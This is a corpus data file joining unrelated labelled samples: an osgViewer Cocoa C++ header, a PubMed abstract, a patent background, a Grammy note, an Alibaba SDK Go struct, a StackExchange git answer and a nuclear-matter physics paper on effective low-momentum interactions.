namespace osgViewer
{
class GraphicsWindowCocoa : public osgViewer::GraphicsWindow, public osgViewer::GraphicsHandleCocoa
{
public:
class Implementation;
GraphicsWindowCocoa(osg::GraphicsContext::Traits* traits):
osgViewer::GraphicsWindow(),
osgViewer::GraphicsHandleCocoa(),
_valid(false),
_initialized(false),
_realized(false),
_closeRequested(false),
_checkForEvents(true),
_ownsWindow(true),
_currentCursor(RightArrowCursor),
_window(NULL),
_view(NULL),
_context(NULL),
_pixelformat(NULL),
_updateContext(false),
_multiTouchEnabled(false)
{
_traits = traits;
init();
if (valid())
{
setState( new osg::State );
getState()->setGraphicsContext(this);
if (_traits.valid() && _traits->sharedContext.valid())
{
getState()->setContextID( _traits->sharedContext->getState()->getContextID() );
incrementContextIDUsageCount( getState()->getContextID() );
}
else
{
getState()->setContextID( osg::GraphicsContext::createNewContextID() );
}
}
}
virtual bool isSameKindAs(const Object* object) const { return dynamic_cast<const GraphicsWindowCocoa*>(object)!=0; }
virtual const char* libraryName() const { return "osgViewer"; }
virtual const char* className() const { return "GraphicsWindowCocoa"; }
virtual bool valid() const { return _valid; }
/** Realise the GraphicsContext.*/
virtual bool realizeImplementation();
/** Return true if the graphics context has been realised and is ready to use.*/
virtual bool isRealizedImplementation() const { return _realized; }
/** Close the graphics context.*/
virtual void closeImplementation();
/** Make this graphics context current.*/
virtual bool makeCurrentImplementation();
/** Release the graphics context.*/
virtual bool releaseContextImplementation();
/** Swap the front and back buffers.*/
virtual void swapBuffersImplementation();
/** Check to see if any events have been generated.*/
virtual bool checkEvents();
/** Set Window decoration.*/
virtual bool setWindowDecorationImplementation(bool flag);
/** Get focus.*/
virtual void grabFocus();
/** Get focus on if the pointer is in this window.*/
virtual void grabFocusIfPointerInWindow();
bool requestClose() { bool b = _closeRequested; _closeRequested = true; return b; }
virtual void resizedImplementation(int x, int y, int width, int height);
virtual bool setWindowRectangleImplementation(int x, int y, int width, int height);
virtual void setWindowName (const std::string & name);
virtual void requestWarpPointer(float x,float y);
virtual void useCursor(bool cursorOn);
virtual void setCursor(MouseCursor mouseCursor);
/** WindowData is used to pass in the Cocoa window handle attached the GraphicsContext::Traits structure. */
class WindowData : public osg::Referenced
{
public:
enum Options { CreateOnlyView = 1, CheckForEvents = 2, PoseAsStandaloneApp = 4, EnableMultiTouch = 8};
WindowData(unsigned int options)
: _createOnlyView(options & CreateOnlyView),
_checkForEvents(options & CheckForEvents),
_poseAsStandaloneApp(options & PoseAsStandaloneApp),
_multiTouchEnabled(options & EnableMultiTouch),
_view(NULL)
{
}
inline NSView* getCreatedNSView() { return _view; }
bool createOnlyView() const { return _createOnlyView; }
bool checkForEvents() const { return _checkForEvents; }
bool poseAsStandaloneApp() const { return _poseAsStandaloneApp; }
bool isMultiTouchEnabled() const { return _multiTouchEnabled; }
protected:
inline void setCreatedNSView(NSView* view) { _view = view; }
private:
bool _createOnlyView, _checkForEvents, _poseAsStandaloneApp, _multiTouchEnabled;
NSView* _view;
friend class GraphicsWindowCocoa;
};
NSOpenGLContext* getContext() { return _context; }
GraphicsWindowCocoaWindow* getWindow() { return _window; }
NSOpenGLPixelFormat* getPixelFormat() { return _pixelformat; }
virtual void setSyncToVBlank(bool f);
/** adapts a resize / move of the window, coords in global screen space */
void adaptResize(int x, int y, int w, int h);
bool isMultiTouchEnabled();
void setMultiTouchEnabled(bool b);
protected:
void init();
void transformMouseXY(float& x, float& y);
void setupNSWindow(NSWindow* win);
virtual ~GraphicsWindowCocoa();
bool _valid;
bool _initialized;
bool _realized;
bool _useWindowDecoration;
private:
bool _closeRequested, _checkForEvents,_ownsWindow;
MouseCursor _currentCursor;
GraphicsWindowCocoaWindow* _window;
GraphicsWindowCocoaGLView* _view;
NSOpenGLContext* _context;
NSOpenGLPixelFormat* _pixelformat;
bool _updateContext, _multiTouchEnabled;
};
}
#endif
#endif
|
{
"pile_set_name": "Github"
}
|
Stimulatory effect of pigeon milk growth factor on protein and nucleic acid synthesis in neonate mice.
Effect of subcutaneously administered pigeon milk-derived growth factor (PMGF) on protein and nucleic acid content of various body organs was studied in neonate mice. Although the body and organ weights of PMGF-treated mice did not differ from those of controls, the weight of testes was significantly higher in the former than the latter. The treated animals had significantly greater content of protein (in liver and skin), DNA (in liver, lung, stomach, duodenum, ileum and rectum) and RNA (in liver, stomach, ileum and skin). The protein/DNA ratio was lower in many organs of PMGF-treated mice. These results indicate that the biological properties of PMGF bear semblance to those of epidermal growth factor isolated from mouse salivary gland and human milk.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Portable audio devices such as mobile phones and smartphones can be used to play back or stream audio in various contexts. During a phone call for example, the device housing may be held against the user's ear. In speakerphone mode, the user may hold the housing in her hand away from her ear, or she may wish to place the device on a table. The device could also be attached to or resting on a stand on an edge or at an angle relative to the table.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
1965: Stan Getz & João Gilberto (with Astrud Gilberto and Antonio Carlos Jobim), Getz/Gilberto . The first jazz album to win Album of the Year, Getz/Gilberto, which combined the talents of American saxophonist Stan Getz and Brazilian guitarist João Gilberto, became one of the best-selling jazz albums of all time. Also nominated were Cotton Candy by Al Hirt, Funny Girl: Original Broadway Cast, People by Barbra Streisand and The Pink Panther by Henry Mancini.
|
{
"pile_set_name": "Pile-CC"
}
|
package yundun_bastionhost
//Licensed under the Apache License, Version 2.0 (the "License");
//you may not use this file except in compliance with the License.
//You may obtain a copy of the License at
//
//http://www.apache.org/licenses/LICENSE-2.0
//
//Unless required by applicable law or agreed to in writing, software
//distributed under the License is distributed on an "AS IS" BASIS,
//WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//See the License for the specific language governing permissions and
//limitations under the License.
//
// Code generated by Alibaba Cloud SDK Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
// InstanceInDescribeInstances is a nested struct in yundun_bastionhost response
type InstanceInDescribeInstances struct {
InstanceId string `json:"InstanceId" xml:"InstanceId"`
RegionId string `json:"RegionId" xml:"RegionId"`
NetworkType string `json:"NetworkType" xml:"NetworkType"`
IntranetIp string `json:"IntranetIp" xml:"IntranetIp"`
InternetIp string `json:"InternetIp" xml:"InternetIp"`
InstanceStatus int `json:"InstanceStatus" xml:"InstanceStatus"`
StartTime int64 `json:"StartTime" xml:"StartTime"`
ExpireTime int64 `json:"ExpireTime" xml:"ExpireTime"`
VpcId string `json:"VpcId" xml:"VpcId"`
VswitchId string `json:"VswitchId" xml:"VswitchId"`
Description string `json:"Description" xml:"Description"`
}
|
{
"pile_set_name": "Github"
}
|
Q:
Can I treat another git user as remote?
I want to push my commits to another git user (it is local development server that need t be a user not a git server) Is it possible to push to another git user? If yes then how?
A:
If your user u1 can access the directory where u2's repo is, through a shared path, then:
u2 can provide a bare repo by cloning repou2 as bare repo.
See for illustration How to push a local git repository to another computer?
# u2
cd /path/to/parent/directory/of/repou2
git clone --bare repou2 barerepou2
cd /repou2
git remote add barerepo ../barerepou2
u1 can then add 'barerepou2' as a remote:
git remote add repou2 /shared/path/to/u2/barerepo
u1 can now push to u2 repo:
git push repou2 master
u2 can check from new contributions by u1
git fetch barerepo
See "Git push only for bare repositories?" on the importance of pushing to a bare repo instead of directly repou2 repo.
|
{
"pile_set_name": "StackExchange"
}
|
---
abstract: 'We performed Self-Consistent Greens Function (SCGF) calculations for symmetric nuclear matter using realistic nucleon-nucleon (NN) interactions and effective low-momentum interactions ($V_{low-k}$), which are derived from such realistic NN interactions. We compare the spectral distributions resulting from such calculations. We also introduce a density-dependent effective low-momentum interaction which accounts for the dispersive effects in the single-particle propagator in the medium.'
author:
- 'P. Bożek[^1]'
- 'D. J. Dean[^2]'
- 'H. Müther[^3]'
title: Correlations and effective interactions in nuclear matter
---
Introduction
============
The description of bulk properties of nuclear systems starting from realistic nucleon-nucleon (NN) interactions is a long-standing and unsolved problem. Various models for the NN interaction have been developed, which describe the experimental NN phase shifts up to the threshold for pion production with high accuracy[@cdbonn; @arv18; @nijmw; @n3lo]. A general feature of all these interaction models are strong short-range and tensor components, which lead to corresponding correlations in the nuclear many-body wave-function. Hartree-Fock mean-field theory, which represents the the lowest-order many-body calculations one can perform with such realistic NN interactions, fails to produce bound nuclei [@reviewartur; @localint] precisely because Hartree-Fock does not fully incorporate many-body correlation effects.
That correlations beyond the mean field are important is supported by experiments exploring the spectral distribution of the single-particle strength. One experimental fact found in all nuclei is the global depletion of the Fermi sea. A recent experiment from NIKHEF puts this depletion of the proton Fermi sea in ${}^{208}$Pb at a little less than 20% [@bat01] in accordance with earlier nuclear matter calculations [@vond1]. Another consequence of the presence of short-range and tensor correlations is the appearance of high-momentum components in the ground state wave-function to compensate for the depleted strength of the mean field. Recent JLab experiments [@rohe:04] indicate that the amount and location of this strength is consistent with earlier predictions for finite nuclei [@mudi:94] and calculations of infinite matter [@frmu:03].
These data and their analysis, however, are not sufficient to allow for a detailed comparison with the predictions derived from the various interaction models at high momenta. In this paper, we want to investigate a possibility to separate the predictions for correlations at low and medium momenta, which are constrained by the NN scattering matrix below pion threshold, from the high momentum components, which may strongly depend on the underlying model for the NN interaction. For that purpose we will perform nuclear many-body calculations within a model space that allows for the explicit evaluation of low-momentum correlations. The effective Hamiltonian for this model space will be constructed from a realistic interaction to account for for correlations outside the model space.
This concept of a model space and effective operators appropriately renormalized for this model space has a long history in approaches to the nuclear many-body physics. As an example we mention the effort to evaluate effective operators to be used in Hamiltonian diagonalization calculations of finite nuclei. For a review on this topic see e.g. [@morten:04]. The concept of a model space for the study of infinite nuclear matter was used e.g. by Kuo et al.[@kumod1; @kumod2; @kumod3]. Also the Brueckner-Hartree-Fock (BHF) approximation can be considered as a model space approach. In this case one restricts the model space to just one Slater-determinant and determines the effective interaction through a calculation of the G-matrix, the solution of the Bethe-Goldstone equation.
The effective hamiltonians for such model space calculations have frequently been evaluated within the Rayleigh-Schrödinger perturbation theory, leading to a non-hermitian and energy-dependent result. The energy-dependence can be removed by considering the so-called folded-diagrams as has been discussed e.g. by Brandow[@brandow:67] and Kuo[@kuo:71]. We note that the folded-diagram expansion yields effective interaction terms between three and more particle, even if one considers a realistic interaction with two-body terms only[@polls:83; @polls:85].
During the last years the folded-diagram technique has been applied to derive an effective low-momentum potential $V_{low-k}$[@bogner:03] from a realistic NN interaction. By construction, $V_{low-k}$ potentials reproduce the deuteron binding-energy, the low-energy phase shifts and the half-on-shell $T$ matrix calculated from the underlying realistic NN interaction up to the chosen cut-off parameter. The resulting $V_{low-k}$ turns out to be rather independent on the original NN interaction if this cut-off parameter for the relative momenta is below the value of the pion-production threshold in NN scattering. The off-shell characteristics of the $V_{low-k}$ effective interaction are not constrained by experimental data and can influence the many-body character of the interaction.
For finite nuclei we find that one does indeed obtain different binding energies for $^{16}$O depending on the underlying NN interaction from which one derives the $V_{low-k}$ interaction. For example, using coupled-cluster techniques at the singles and doubles level (CCSD) [@dean04] we find binding energies for $^{16}$O at a lab-momentum cutoff of $\Lambda=2.0$ fm$^{-1}$ to be $-143.4\pm 0.4$ MeV and $-153.3\pm 0.4$ MeV for the N$^3$LO [@n3lo] and CD-Bonn two-body interactions, respectively. The CCSD calculations were carried out at up to 7 major oscillator shells (with extrapolations to an infinite model space) using the intrinsic Hamiltonian defined as $H=T-T_{cm}+V_{low-k}$ where $T_{cm}$ is the center of mass kinetic energy.
Attractive energies are obtained if such a $V_{low-k}$ interaction is used in a Hartree-Fock calculation of nuclear matter or finite nuclei[@corag:03; @kuck:03]. High-momentum correlations, which are required to obtain bound nuclear systems from a realistic NN interaction (see above) are taken into account in the renormalization procedure which leads to $V_{low-k}$. Supplementing these Hartree-Fock calculations with corrections up to third order in the Goldstone perturbation theory leads to results for the ground-state properties of $^{16}O$ and $^{40}Ca$, which are in fair agreement with the empirical data[@corag:03]. (One should note that $T_{cm}$ was not included in these calculations.) Calculations in infinite matter demonstrate that $V_{low-k}$ seems to be quite a good approximation for the evaluation of low-energy spectroscopic data. The results for the pairing derived from the bare interaction are reproduced[@kuck:03]. The prediction of pairing properties also agree with results obtained phenomenological interactions like the Gogny force[@gogny; @sedrak:03]. The $V_{low-k}$ interaction also yields a good approximation for the calculated binding energy of nuclear matter at low densities.
At high densities, however, BHF calculations using $V_{low-k}$ yield too much binding energy and do not reproduce the saturation feature of nuclear matter[@kuck:03]. This is due to the fact that $V_{low-k}$ does not account for the effects of the dispersive quenching of the two-particle propagator, as it is done e.g. in the Brueckner $G$-matrix derived from a realistic NN interaction. The saturation can be obtained if a three-body nucleon is added to the hamiltonian[@bogner:05].
An alternative technique to determine an effective hamiltonian for a model space calculation is based on a unitary transformation of the hamiltonian. It has been developed by Suzuki[@suzuki:82] and leads to an energy-independent, hermitian effective interaction. The unitary-model-operator approach (UMOA) has also been used to evaluate the ground-state properties of finite nuclei[@suz13; @suz15; @fuji:04; @roth:05].
In the present study we are going to employ the unitary transformation technique to determine an effective interaction, which corresponds to the $V_{low-k}$ discussed above. This effective interaction will then be used in self-consistent Green’s function (SCGF) calculation of infinite nuclear matter. Various groups have recently developed techniques to solve the corresponding equations and determine the energy- and momentum-distribution of the single-particle strength in a consistent way[@frmu:03; @bozek0; @bozek1; @bozek2; @dewulf:03; @rd; @frmu:05]. Therefore we can study the correlation effects originating from $V_{low-k}$ inside the model space and compare it to the correlations derived from the bare interaction. Furthermore we use the unitary transformation technique to determine an effective interaction which accounts for dispersive effects missing in the original $V_{low-k}$ (see discussion above).
After this introduction we will present the method for evaluating the effective interaction in section 2 and briefly review the basic features of the SCGF approach in section 3. The results of our investigations are presented in section 4, which is followed up by the conclusions.
Effective interaction
=====================
For the definition and evaluation of an effective interaction to be used in a nuclear structure calculation, which is restricted to a subspace of the Hilbert space, the so-called model space, we follow the usual notation and define a projection operator $P$, which projects onto this model space. The operator projecting on the complement of this subspace is identified by $Q$ and these operators satisfy the usual relations like $P+Q=1$, $P^2=P$, $Q^2=Q$, and $PQ=0=QP$. It is the aim of the Unitary Model Operator Approach (UMOA) to define a unitary transformation $U$ in such a way, that the transformed Hamiltonian does not couple the $P$ and $Q$ space, i.e. $QU^{-1}HUP=0$.
For a many-body system the resulting Hamiltonian can be evaluated in a cluster expansion, which leads to many-body terms. This is very similar to the folded diagram expansion, which has been discussed above. In UMOA studies of finite nuclei terms up to three-body clusters have been evaluated[@suz13; @suz15] indicating a convergence of the expansion up to this order.
In the present study we would like to determine an effective two-body interaction and therefore consider two-body systems only. We define the effective interaction as $$V_{eff} = U^{-1}\left( h_0 + v_{12}\right) U - h_0\,,\label{eq:veff1}$$ with $v_{12}$ representing the bare NN interaction. The operator $h_0$ denotes the one-body part of the two-body system and contains the kinetic energy of the interacting particles. This formulation will lead to an effective interaction corresponding to $V_{low-k}$. Since, however, we want to determine an effective interaction of two nucleons in the medium of nuclear matter, we will also consider the possibility to add a single-particle potential to $h_0$. Note that in any case $h_0$ commutes with the projection operators $P$ and $Q$.
The operator for the unitary transformation $U$ can be expressed as[@suz24] $$U=(1+\omega-\omega ^{\dagger})(1+\omega \omega ^{\dagger}
+\omega ^{\dagger}\omega )^{-1/2}\,,\label{eq:veff2}$$ with an operator $\omega$ satisfying $\omega=Q\omega P$ such that $\omega^2 = \omega^{\dagger 2} = 0$. In the following we will describe how to determine the matrix elements of this operator $\omega$. As a first step we solve the two-body eigenvalue equation $$\left( h_0 + v_{12}\right)\vert \Phi _{k}\rangle =E_{k}\vert \Phi _{k}\rangle\,.
\label{eq:veff2a}$$ This can be done separately for each partial wave of the two-nucleon problem. Partial waves are identified by total angular momentum $J$, spin $S$ and isospin $T$. The relative momenta are appropriately discretized such that we can reduce the eigenvalue problem to a matrix diagonalization problem. Momenta below the cut-off momentum $\Lambda$ define the $P$ space and will subsequently be denoted by $\vert p\rangle$ and $\vert p'\rangle$. Momenta representing the $Q$ space will be labeled by $\vert q\rangle$ and $\vert q'\rangle$, while states $\vert
i\rangle$, $\vert j\rangle$, $\vert k \rangle$ and $\vert l \rangle$ refer to basis states of the total $P+Q$ space.
From the eigenstates $\vert \Phi _{k}\rangle$ we determine those $N_P$ ($N_P$ denoting the dimension of the $P$ space) eigenstates $\vert \Phi _{p}\rangle$, which have the largest overlap with the $P$ space and determine $$\label{eq:veff3}
\langle q\vert\omega\vert p'\rangle =\sum_{p=1}^{N_P}\langle q\vert Q\vert
\Phi _{p}\rangle
\langle \tilde{\varphi}_{p}\vert p'\rangle,$$ with $\vert \varphi_{p}\rangle = P\vert \Phi_{p}\rangle$ and $\langle
\tilde{\varphi}_{p}\vert$ denoting the biorthogonal state, satisfying $$\sum_{p}\langle \tilde{\varphi} _{k}|p\rangle \langle p|\varphi _{k'}\rangle \quad
\mbox{and} \quad
\sum_{k}\langle p'|\tilde{\varphi} _{k}\rangle \langle \varphi _{k}|p\rangle
=\delta _{p,p'}\,.\label{eq:veff4}$$ In the next step we solve the eigenvalue problem in the $P$ space $$\omega ^{\dagger}\omega\vert\chi_{p}\rangle
=\mu _{p}^{2}|\chi_{p} \rangle\, ,\label{eq:veff5}$$ and use the results to define $$\vert\nu _{p}\rangle =\frac{1}{\mu _{p}}\omega \vert\chi _{p}\rangle
,\label{eq:veff5a}$$ which due to the fact that $\omega=Q\omega P$, can be written as $$\label{eq:veff5b}
\langle q|\nu _{p}\rangle =\frac{1}{\mu _{p}}
\sum_{p'}\langle q|\omega |p'\rangle \langle p'|\chi_{p}\rangle\, .$$ Using Eqs. (\[eq:veff5\]) - (\[eq:veff5b\]) and the representation of $U$ in Eq. (\[eq:veff2\]), the matrix elements of the unitary transformation operator $U$ can be written $$\begin{aligned}
\label{eq:Up'p}
\langle p''|U|p'\rangle
&=&\langle p''|(1+\omega^{\dagger}\omega )^{-1/2}|p'\rangle \nonumber \\
&=&\sum_{p=1}^{N_P}(1+\mu_{p}^{2})^{-1/2}
\langle p''|\chi_{p}\rangle \langle \chi_{p}|p'\rangle \,,\end{aligned}$$ $$\begin{aligned}
\label{eq:Uqp}
\langle q|U|p'\rangle
&=&\langle q|\omega (1+\omega^{\dagger}\omega )^{-1/2}|p'\rangle \nonumber \\
&=&\sum_{p=1}^{N_P}(1+\mu_{p}^{2})^{-1/2}\mu _{p}
\langle q|\nu _{p}\rangle \langle \chi _{p}|p'\rangle\, ,\end{aligned}$$ $$\begin{aligned}
\label{eq:Upq}
\langle p'|U|q\rangle
&=&-\langle p'|\omega ^{\dagger}(1+\omega \omega ^{\dagger})^{-1/2}
|q\rangle \nonumber \\
&=&-\sum_{p=1}^{N_P}(1+\mu_{p}^{2})^{-1/2}\mu_{p}
\langle p'\vert\chi_{p}\rangle \langle \nu_{p}\vert q\rangle \,, \end{aligned}$$ $$\begin{aligned}
\label{eq:Uq'q}
\langle q'|U|q\rangle
&=&\langle q'|(1+\omega \omega ^{\dagger})^{-1/2}\vert q\rangle \nonumber \\
&=&\sum_{p=1}^{N_P}\{(1+\mu_{p}^{2})^{-1/2}-1\}
\langle q'|\nu _{p}\rangle \langle \nu _{p}|q\rangle + \delta
_{q,q'}\,.\end{aligned}$$ These matrix elements of $U$ can then be used to determine the matrix elements of the effective interaction $V_{eff}$ according to Eq.(\[eq:veff1\]). They might also be used to define matrix elements of other effective operators.
Self-consistent Green’s function approach
=========================================
One of the key quantities within the Self-consistent Green’s Function (SCGF) approach is the retarded single-particle (sp) Green’s function or sp propagator $G(k,\omega)$ (see e.g.[@diva:05]). Its imaginary part can be used to determine the spectral function $$\label{spec_g2}
A(k,\omega)=-2\,{\mathrm{Im}}\,G(k,\omega+{\mathrm{i}}\eta)\,.$$ The spectral function provides the information about the energy- and momentum-distribution of the single-particle strength, i.e. the probability for adding or removing a particle with momentum $k$ and leaving the residual system at an excitation energy related to $\omega$. In the limit of the mean-field or quasi-particle approximation the spectral function is represented by a $\delta$-function and takes the simple form $$A(k,\omega)=2\pi\delta(\omega -\varepsilon_k)
\,,\label{eq:specqp}$$ with the quasi-particle energy $\varepsilon_k$ for a particle with momentum $k$. The sp Green’s function can be obtained from the solution of the Dyson equation, which reduces for the system of homogeneous infinite matter to a a simple algebraic equation $$\left[\omega -\frac{k^2}{2m}-\Sigma(k,\omega)\right]
G(k,\omega) = 1\,,\label{eq:dyson}$$ where $\Sigma(k,\omega)$ denotes the complex self-energy. The self-energy can be decomposed into a generalized Hartree-Fock part plus a dispersive contribution $$\label{spec_Sigma}
\Sigma(k,\omega)=\Sigma^{HF}(k)-\frac{1}{\pi}\int_{-\infty}^{+\infty}
{\mathrm{d}}\omega^{\prime} \, \frac{{\mathrm{Im}}\Sigma(k,\omega^{\prime}+
{\mathrm{i}}\eta)}
{\omega-\omega^{\prime}}.$$ The next step is to obtain the self energy in terms of the in-medium two-body scattering $T$ matrix. It is possible to express ${\mathrm{Im}}\Sigma(k,\omega+{\mathrm{i}}\eta)$ in terms of the retarded $T$ matrix [@frmu:03; @bozek3; @kadanoff] (for clarity, spin- and isospin quantum number are suppressed) $$\begin{aligned}
\label{im_sigma}
{\mathrm{Im}}\Sigma(k,\omega+{\mathrm{i}}\eta)&=&
\frac{1}{2}\int \frac{{\mathrm{d}}^3k^{\prime}}{(2\pi)^3}
\int_{-\infty}^{+\infty} \frac{{\mathrm{d}}\omega^{\prime}}{2\pi}
\left<{\mathbf{kk}}^{\prime}|
{\mathrm{Im}}T(\omega+\omega^{\prime}+{\mathrm{i}}\eta)|
{\mathbf{kk}}^{\prime}\right> \nonumber \\ && \qquad \times
[f(\omega^{\prime})+b(\omega+\omega^{\prime})]
A(k^{\prime},\omega^{\prime}).\end{aligned}$$ Here and in the following $f(\omega)$ and $b(\omega)$ denote the Fermi and Bose distribution functions, respectively. These functions depend on the chemical potential $\mu$ and the inverse temperature $\beta$ of the system. The in-medium scattering matrix $T$ is to be determined as a solution of the integral equation $$\begin{aligned}
\left<{\mathbf{kk}}^{\prime}|T(\Omega+{\mathrm{i}}\eta)|
{\mathbf{pp}}^{\prime}\right> & = &\left<{\mathbf{kk}}^{\prime}|V|
{\mathbf{pp}}^{\prime}\right> + \int
\frac{d^3q\,d^3q^\prime}{\left(2\pi\right)^6} \left<{\mathbf{kk}}^{\prime}|V|
{\mathbf{qq}}^{\prime}\right>G^0_{\mathrm{II}}(\mathbf{qq}^\prime,\Omega+i\eta)
\nonumber \\ &&\quad\quad\times
\left<{\mathbf{qq}}^{\prime}|T(\Omega+{\mathrm{i}}\eta)|
{\mathbf{pp}}^{\prime}\right>\,,\label{eq:tscat0}\end{aligned}$$ where $$\label{two_pp}
G^0_{\mathrm{II}}(k_1,k_2,\Omega+i\eta)=
\int_{-\infty}^{+\infty}\frac{{\mathrm{d}}\omega}{2\pi}
\int_{-\infty}^{+\infty}\frac{{\mathrm{d}}\omega^{\prime}}{2\pi}
A(k_1,\omega)A(k_2,\omega^{\prime})
\frac{1-f(\omega)-f(\omega^{\prime})}
{\Omega-\omega-\omega^{\prime}+i\eta}\,.$$ stands for the two-particle Green’s function of two non-interacting but dressed nucleons. The matrix elements of the two-body interaction $V$ represent either the bare NN interaction $v_{12}$ or the effective interaction $V_{eff}$, in which case the integrals are cut at the cut-off parameter $\Lambda$.
The in-medium scattering equation (\[eq:tscat0\]) can be reduced to a set of one-dimensional integral equations if the two-particle Green’s function in (\[two\_pp\]) is written as a function of the total and relative momenta of the interacting pair of nucleons and the usual angle-average approximation is employed (see *e.g.* [@angleav] for the accuracy of this approximation). This leads to integral equations in the usual partial waves, which can be solved very efficiently if the two-body interaction is represented in terms of separable interaction terms of a sufficient rank[@bozek1].
Finally, we consider the generalized Hartree-Fock contribution to the self-energy in (\[spec\_Sigma\]), which takes the form $$\label{hf_sigma}
\Sigma^{HF}(k)
=
\frac{1}{2} \int \frac{{\mathrm{d}}^3k^{\prime}}{(2\pi)^3}
\left<{\mathbf{k}},{\mathbf{k}}^{\prime}\right|
V \left|{\mathbf{k}},{\mathbf{k}}^{\prime}\right> n(k^{\prime}),$$ where $n(k)$ is the correlated momentum distribution, which is to be calculated from the spectral function by $$\label{occupation}
n(k)=
\int_{-\infty}^{+\infty} \frac{{\mathrm{d}}\omega}{2\pi}
f(\omega)
A(k,\omega).$$ Also the energy per particle, $E/A$, can be calculated from the spectral function using Koltun’s sum rule $$\label{eda}
\frac{E}{A}=\frac{1}{\rho}
\int \frac{{\mathrm{d}}^3k}{(2\pi)^3}
\int_{-\infty}^{+\infty} \frac{{\mathrm{d}}\omega}{2\pi}
\frac{1}{2}\left(\frac{k^2}{2m}+\omega\right)A(k,\omega)f(\omega)\,.$$ Eqs.(\[spec\_g2\])-(\[occupation\]) define the so-called $T$-matrix approach to the SCGF equations. They form a symmetry conserving approach in the sense of [@kadanoff], which means that thermodynamical relations like the Hughenholtz-Van Hove theorem[@hugenholtz; @bozek1] are obeyed.
The Brueckner-Hartree-Fock (BHF) approximation, which is very popular in nuclear physics, can be regarded as a simple approximation to this $T$-matrix approach. In the BHF approximation one reduces the spectral function $A(k,\omega)$ to the quasiparticle approximation (\[eq:specqp\]). Furthermore one ignores the hole-hole scattering terms in the scattering Eq.(\[eq:tscat0\]), which means that one replaces $$\left(1-f(\omega)-f(\omega')\right) \quad\rightarrow \quad \left(1-f(\omega)
\right) \left(1-f(\omega')\right)\,,
\label{eq:pauliop}$$ which is the usual Pauli operator (at finite temperature). This reduces the in-medium scattering equation to the Bethe-Goldstone equation. The removal of the hole-hole scattering terms leads to real self-energies $\Sigma(k,\omega)$ at energies $\omega$ below the chemical potential, i.e. for the hole states.
Results and discussion
======================
In the following we discuss results for symmetric nuclear matter obtained from Self-Consistent Greens Function (SCGF) calculations. These calculations are either performed in the complete Hilbert space using the bare CD-Bonn [@cdbonn] interaction or in the model space, which is defined by a cut-off parameter $\Lambda$ = 2 fm$^{-1}$ in the two-body scattering equation, employing the corresponding effective interaction $V_{low-k}$, which is derived from the CD-Bonn interaction using the techniques described in Sect II. We note that using this unitary model operator technique we were able to reproduce the results of the BHF calculations presented in [@kuck:03], which used tabulated matrix elements of [@bogner:03], with good accuracy. The NN interaction has been restricted to partial waves with total angular momentum $J$ less than 6.
Results for the calculated energy per nucleon are displayed in Fig. \[fig:becd1\] for various densities, which are labeled by the corresponding Fermi momentum $k_F$. The effective interaction $V_{low-k}$ accounts for a considerable fraction of the short-range NN correlations, which are induced by realistic interactions like the CD-Bonn interactions. Therefore, already the Hartree-Fock approximation using this $V_{low-k}$ yields reasonable results for the energies as can be seen from the dotted line of Fig. \[fig:becd1\]. Hartree-Fock calculations using the bare CD-Bonn interaction yield positive energies ranging between 2 MeV per nucleon and 15 MeV per nucleon for the densities considered in this figure. Note that the CD-Bonn interaction should be considered as a soft realistic interaction. Interaction models, which are based on local potentials, like the Argonne interaction [@arv18], yield more repulsive Hartree-Fock energies [@localint].
![(Color online) Binding energy per nucleon for symmetric nuclear matter as function of the Fermi momentum: Results of self-consistent $T$-matrix calculations for the CD-Bonn potential (dashed line), are compared to results of calculations using $V_{low-k}$ with $\Lambda=2$fm$^{-1}$ in the Hartree-Fock approximation (dotted line), the self-consistent second order approximation (dashed-dotted line) and for the self-consistent $T-$matrix approximation (solid line) within the model space. []{data-label="fig:becd1"}](becd1.eps){width="10.5cm"}
The inclusion of correlations within the model space yields a substantial decrease of the energy. The self-consistent $T$-matrix approach provides additional attraction ranging between 6 MeV per nucleon at a density of 0.4 $\rho_0$ (with $\rho_0$ the empirical saturation density) and 3 MeV per nucleon at 2 $\rho_0$. The fixed cut-off parameter $\Lambda$ seems to reduce the phase-space available for correlations beyond the mean-field approach at higher densities. Therefore the energy calculated in the self-consistent $T$-matrix approach reduces to the Hartree-Fock result at large densities.
Fig. \[fig:becd1\] also displays the energies resulting from a SCGF calculation within the model space, in which the $T$-matrix has been approximated by the corresponding scattering matrix including only terms up to second order in the NN interaction $V$. The results of such second-order calculations in $V_{low-k}$ are represented by the dashed-dotted line and show a very good agreement with the model-space calculations including the full $T$-matrix. This confirms the validity of approaches, which consider correlation effects within the model-space in a perturbative way.
All these model space calculations using $V_{low-k}$, however, fail to reproduce the results of the SCGF calculations, which are obtained in the complete space using the bare NN interaction, which are labeled by CD Bonn T-matrix in Fig. \[fig:becd1\]. In particular, the model space calculations yield to attractive energies at high densities and therefore do not exhibit a minimum for the energy as a function of density. This confirms the results of the BHF calculations of [@kuck:03].
It has been argued [@kuck:03] that this overestimate of the binding energy at high densities is due to the fact that $V_{low-k}$ does not account for the quenching of correlation effects, which is due to the Pauli principle and the dispersive effects in the single-particle propagator getting more important with increasing density. Therefore we try to account for the dispersive quenching effects by adopting the following two-step procedure.
In a vein similar to the use of a G-matrix within a self-consistent BHF calculation, as a first step we perform BHF calculations using $V_{low-k}$. The resulting single-particle spectrum is approximated by an effective mass parameterization. This parameterization of the mean field is employed to define the single-particle operator $h_0$, used in Eq. (\[eq:veff1\]) and the following equations of Sect. II (see also [@fuji:04]). The resulting effective interaction is used again for a BHF calculation within the model space, leading to an update of the mean field parameterization. The procedure is repeated until a self-consistent result is obtained. Since the mean field parameterization depends on the density, this method yields an effective density-dependent interaction, which in the limit of the density $\rho\to 0$ coincides with $V_{low-k}$. Therefore we call this effective interaction the density dependent $V_{low-k}$ or in short $V_{low-k}(\rho)$. Such a procedure amounts to summing up certain higher order terms in the full many-body problem.
![(Color online) Same as Fig. \[fig:becd1\] but for $V_{low-k}(\rho)$ calculated at each density[]{data-label="fig:becd2"}](becd2.eps){width="10.5cm"}
